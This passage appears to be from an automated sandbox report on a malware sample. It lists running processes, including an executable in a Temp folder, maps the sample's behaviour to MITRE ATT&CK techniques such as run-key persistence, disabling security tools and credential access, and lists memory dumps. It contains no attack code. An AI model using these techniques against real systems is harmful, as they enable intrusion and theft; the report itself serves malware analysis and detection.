C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7144

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8664

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5336

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3068

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/8-198-0x0000000000A80000-0x0000000000A81000-memory.dmp

Filesize
4KB

Download
memory/8-201-0x0000000000A80000-0x0000000000A81000-memory.dmp

Filesize
4KB

Download
memory/680-267-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/740-377-0x0000000001470000-0x0000000001472000-memory.dmp

Filesize
8KB

Download
memory/744-384-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/744-385-0x0000000000400000-0x000000000088F000-memory.dmp

Filesize
4.6MB

Download
memory/1164-243-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1184-293-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1552-332-0x0000000000500000-0x000000000064A000-memory.dmp

Filesize
1.3MB

Download
memory/1552-326-0x0000000000500000-0x000000000064A000-memory.dmp

Filesize
1.3MB

Download
memory/1732-224-0x0000000000400000-0x000000000089C000-memory.dmp

Filesize
4.6MB

Download
memory/1732-221-0x00000000008A0000-0x00000000008E9000-memory.dmp

Filesize
292KB

Download
memory/1744-348-0x00000000049E0000-0x00000000049E1000-memory.dmp

Filesize
4KB

Download
memory/1744-298-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/1772-200-0x000000001B4B0000-0x000000001B4B2000-memory.dmp

Filesize
8KB

Download
memory/1772-171-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download
memory/2020-291-0x0000000007C20000-0x0000000007C21000-memory.dmp

Filesize
4KB

Download
memory/2020-287-0x00000000050A0000-0x00000000050DB000-memory.dmp

Filesize
236KB

Download
memory/2020-304-0x00000000076D0000-0x00000000076D1000-memory.dmp

Filesize
4KB

Download
memory/2020-270-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/2020-296-0x0000000007670000-0x0000000007671000-memory.dmp

Filesize
4KB

Download
memory/2020-299-0x00000000077A0000-0x00000000077A1000-memory.dmp

Filesize
4KB

Download
memory/2020-321-0x0000000000F70000-0x0000000000F71000-memory.dmp

Filesize
4KB

Download
memory/2140-343-0x0000000004C70000-0x0000000005276000-memory.dmp

Filesize
6.0MB

Download
memory/2212-545-0x00000000069A2000-0x00000000069A3000-memory.dmp

Filesize
4KB

Download
memory/2212-532-0x00000000069A0000-0x00000000069A1000-memory.dmp

Filesize
4KB

Download
memory/2240-215-0x0000000006840000-0x0000000006841000-memory.dmp

Filesize
4KB

Download
memory/2240-249-0x0000000007510000-0x0000000007511000-memory.dmp

Filesize
4KB

Download
memory/2240-193-0x0000000000D60000-0x0000000000D61000-memory.dmp

Filesize
4KB

Download
memory/2240-176-0x00000000006E0000-0x00000000006E1000-memory.dmp

Filesize
4KB

Download
memory/2240-180-0x00000000006E0000-0x00000000006E1000-memory.dmp

Filesize
4KB

Download
memory/2240-209-0x0000000006842000-0x0000000006843000-memory.dmp

Filesize
4KB

Download
memory/2240-204-0x0000000006E80000-0x0000000006E81000-memory.dmp

Filesize
4KB

Download
memory/2240-426-0x000000007F7F0000-0x000000007F7F1000-memory.dmp

Filesize
4KB

Download
memory/2240-445-0x0000000006843000-0x0000000006844000-memory.dmp

Filesize
4KB

Download
memory/2240-244-0x0000000006D30000-0x0000000006D31000-memory.dmp

Filesize
4KB

Download
memory/2240-246-0x0000000006DA0000-0x0000000006DA1000-memory.dmp

Filesize
4KB

Download
memory/2392-279-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/2528-373-0x0000000000A00000-0x0000000000B4A000-memory.dmp

Filesize
1.3MB

Download
memory/2528-375-0x0000000000400000-0x00000000008EF000-memory.dmp

Filesize
4.9MB

Download
memory/2712-236-0x00000000053C0000-0x00000000053C1000-memory.dmp

Filesize
4KB

Download
memory/2712-258-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

Filesize
4KB

Download
memory/2712-245-0x00000000055B0000-0x00000000055B1000-memory.dmp

Filesize
4KB

Download
memory/2712-240-0x0000000005370000-0x0000000005371000-memory.dmp

Filesize
4KB

Download
memory/2712-230-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/2800-475-0x0000000005F20000-0x000000000606A000-memory.dmp

Filesize
1.3MB

Download
memory/2816-149-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2816-146-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/2816-141-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2816-151-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2816-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2816-143-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2816-139-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2816-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2816-140-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2816-153-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2816-150-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2816-145-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/3020-337-0x0000000002840000-0x0000000002856000-memory.dmp

Filesize
88KB

Download
memory/3020-574-0x00000000042A0000-0x00000000042B6000-memory.dmp

Filesize
88KB

Download
memory/3192-186-0x0000000000880000-0x0000000000881000-memory.dmp

Filesize
4KB

Download
memory/3192-207-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/3192-219-0x0000000001030000-0x0000000001032000-memory.dmp

Filesize
8KB

Download
memory/3280-370-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
memory/3416-227-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4024-491-0x0000000005E20000-0x0000000005F6A000-memory.dmp

Filesize
1.3MB

Download
memory/4068-430-0x000000007F550000-0x000000007F551000-memory.dmp

Filesize
4KB

Download
memory/4068-178-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/4068-228-0x0000000004472000-0x0000000004473000-memory.dmp

Filesize
4KB

Download
memory/4068-214-0x0000000004470000-0x0000000004471000-memory.dmp

Filesize
4KB

Download
memory/4068-182-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/4068-237-0x00000000069F0000-0x00000000069F1000-memory.dmp

Filesize
4KB

Download
memory/4068-446-0x0000000004473000-0x0000000004474000-memory.dmp

Filesize
4KB

Download
memory/4204-346-0x00000000010F0000-0x00000000010F2000-memory.dmp

Filesize
8KB

Download
memory/4244-367-0x0000000002E80000-0x0000000002E82000-memory.dmp

Filesize
8KB

Download
memory/4300-116-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/4300-115-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/4368-339-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

Filesize
4KB

Download
memory/4368-494-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4368-289-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/4368-305-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

Filesize
4KB

Download
memory/4936-239-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/4936-241-0x0000000000400000-0x0000000000883000-memory.dmp

Filesize
4.5MB

Download
memory/4952-302-0x0000000007DD0000-0x0000000007DD1000-memory.dmp

Filesize
4KB

Download
memory/4952-297-0x0000000002F10000-0x0000000002F11000-memory.dmp

Filesize
4KB

Download
memory/4952-275-0x0000000002EE0000-0x0000000002F05000-memory.dmp

Filesize
148KB

Download
memory/4952-263-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/4952-288-0x0000000007C00000-0x0000000007C01000-memory.dmp

Filesize
4KB

Download
memory/4952-294-0x0000000008300000-0x0000000008301000-memory.dmp

Filesize
4KB

Download
memory/4956-284-0x00000000007C0000-0x00000000007C1000-memory.dmp

Filesize
4KB

Download
memory/4956-301-0x0000000004FA0000-0x0000000004FDB000-memory.dmp

Filesize
236KB

Download
memory/4956-350-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/5432-526-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5452-500-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5480-541-0x00000000064E0000-0x00000000064E1000-memory.dmp

Filesize
4KB

Download
memory/5480-549-0x00000000064E2000-0x00000000064E3000-memory.dmp

Filesize
4KB

Download
memory/5556-450-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/5556-455-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/5556-457-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/5556-453-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/5740-552-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5868-577-0x00000000008A0000-0x00000000009EA000-memory.dmp

Filesize
1.3MB

Download
memory/5940-504-0x0000000004FE2000-0x0000000004FE3000-memory.dmp

Filesize
4KB

Download
memory/5940-537-0x0000000004FE4000-0x0000000004FE6000-memory.dmp

Filesize
8KB

Download
memory/5940-496-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/5940-507-0x0000000004FE3000-0x0000000004FE4000-memory.dmp

Filesize
4KB

Download
memory/5940-485-0x0000000000400000-0x0000000000888000-memory.dmp

Filesize
4.5MB

Download
memory/5940-482-0x00000000001C0000-0x00000000001EF000-memory.dmp

Filesize
188KB

Download
memory/6112-479-0x000000001AE70000-0x000000001AE72000-memory.dmp

Filesize
8KB

Download
memory/6136-488-0x0000000000400000-0x0000000000883000-memory.dmp

Filesize
4.5MB

Download